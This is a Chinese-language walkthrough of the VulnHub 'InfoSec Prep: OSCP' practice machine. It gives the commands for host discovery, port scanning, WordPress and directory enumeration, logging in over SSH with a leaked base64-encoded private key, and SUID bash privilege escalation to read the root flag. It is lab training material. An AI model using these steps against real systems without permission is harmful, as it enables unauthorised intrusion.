虚拟机下载地址:https://www.vulnhub.com/entry/infosec-prep-oscp,508/
虚拟机简介:这台机器是为InfoSec Prep Discord 服务器创建的
目标:1个flag
级别:中级
1、信息收集
1.1通过arp-scan检测主机IP地址
arp-scan 192.168.207.0/24
1.2 通过nmap进行端口扫描
nmap -A -sS -sV -v -p- 192.168.207.148
查看开放22、80、33060端口
2、渗透测试
2.1 WEB渗透
1.站点信息收集
访问站点首页显示OSCP靶机页面
通过dirb进行目录扫描,发现存在WordPress
dirb http://192.168.207.148
2.使用wpscan进行扫描
使用wpscan未发现有用信息,仅发现一个admin账号
wpscan --url "http://192.168.207.148/" -eu
使用gobuster进行爆破发现存在secret.txt
gobuster dir -u http://192.168.207.148 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .html,.php,.txt
访问secret.txt中发现文件内容为base64编码
3.获取SSH密钥
通过base64解码,发现为SSH密钥
复制解密内容并保存为id_rsa,修改文件权限,并根据站点首页提示仅有一个oscp账号
chmod 600 id_rsa
ssh -i id_rsa [email protected]
2.2 主机渗透
1.查看SUID文件
find / -perm -u=s -type f 2>/dev/null
2.通过bash提权
通过bash提权已经获取到root权限
bash -p
id
查看FLAG
cat /root/flag.txt
原文始发于微信公众号(安全孺子牛):OSCP难度靶机之Infosec Prep OSCP
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论